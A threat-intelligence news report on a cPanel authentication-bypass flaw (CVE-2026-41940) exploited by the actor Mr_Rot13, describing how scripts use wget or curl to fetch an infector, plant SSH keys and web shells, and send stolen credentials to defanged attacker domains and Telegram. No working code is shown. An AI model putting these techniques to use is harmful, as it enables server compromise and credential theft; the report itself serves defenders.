Cybersecurity Alert: Exploitation of Critical cPanel Vulnerability by Threat Actor Mr_Rot13
A recent investigation has unveiled alarming activities by a threat actor known as Mr_Rot13, who has been exploiting a critical vulnerability in cPanel to deploy a backdoor identified as Filemanager. This serious security risk stems from a flaw tagged as CVE-2026-41940, which affects both cPanel and WebHost Manager (WHM). The flaw can result in authentication bypass, effectively granting remote attackers elevated control over the hosting environment and potentially endangering numerous websites and services.
The situation escalated rapidly following the public disclosure of the vulnerability late last month. A thorough report from QiAnXin XLab highlights that various malicious actors have already begun exploiting this leak, engaging in activities such as cryptocurrency mining, ransomware distribution, botnet creation, and backdoor installation. The report indicates a concerning rise in activity, stating, “Data monitoring indicates that over 2,000 attacker source IPs across the globe are currently involved in automated assaults and cybercrime initiatives targeting this vulnerability.” Particularly active regions include Germany, the United States, Brazil, and the Netherlands, reflecting a widespread, international threat landscape.
In an effort to gain and maintain persistent access to compromised systems, Mr_Rot13 and his associates employ a shell script that utilizies either wget or curl to retrieve a Go-based infector from a remote server, specifically designated as “cp.dene.[de[.]com.” This infector is tailored to implant an SSH public key on the compromised cPanel server, facilitating ongoing access for the attackers. In combination with this act, the script also deploys a PHP web shell specifically designed for handling file uploads and downloads, as well as executing remote commands.
Once established, this web shell becomes a key player in the attack chain. It injects JavaScript code that leads to the delivery of a sophisticated customized login page, serving the dual purpose of capturing user credentials and relaying them back to an attacker-controlled server. Notably, the intercepted data undergoes encoding through a technique known as the ROT13 cipher, sending it to a domain, “wrned[.]com,” which is also associated with these nefarious activities.
Moreover, the infector is not limited to basic tasks; it possesses the capability to harvest sensitive information from the affected host. Key data, including bash history, SSH credentials, device specifications, database passwords, and cPanel virtual aliases, are dispatched to a Telegram group managed by a user identified as “0xWR.” This automated pipeline further illustrates the organized nature of the threat actor’s operations.
The delivery mechanism for Filemanager, one of the prominent backdoors employed, occurs through another shell script retrieved from the domain “wpsock[.]com.” This backdoor enhances the attacker’s capabilities by offering file management functions, remote command execution, and shell functionalities designed to exacerbate the breach and deepen the control over the compromised systems.
Analysis suggests that Mr_Rot13 has been operating with remarkable stealth for several years. Evidence indicates that the command-and-control (C2) domain encoded within the JavaScript has long been utilized within a PHP-based backdoor identified as “helper.php.” This backdoor was previously identified on the VirusTotal platform as far back as April 2022, with the domain’s registration tracing back to October 2020.
According to XLab, the detection of samples and infrastructure connected to Mr_Rot13 remains disproportionately low across various security products, raising concerns regarding the effectiveness of existing defenses against his sophisticated tactics. The six-year period from 2020 to the present highlights a concerning gap in the threat landscape, emphasizing the need for heightened vigilance and robust security measures to combat such elusive cyber threats.
Organizations are urged to assess their cybersecurity protocols, specifically around the vulnerabilities associated with cPanel, and take proactive steps to ensure their systems and data remain secure against potential assaults of this nature. The emergence of sophisticated attack vectors like that of Mr_Rot13 underscores a pressing need for teams to adopt a comprehensive approach to cybersecurity, combining technology, education, and proactive monitoring to mitigate these growing risks.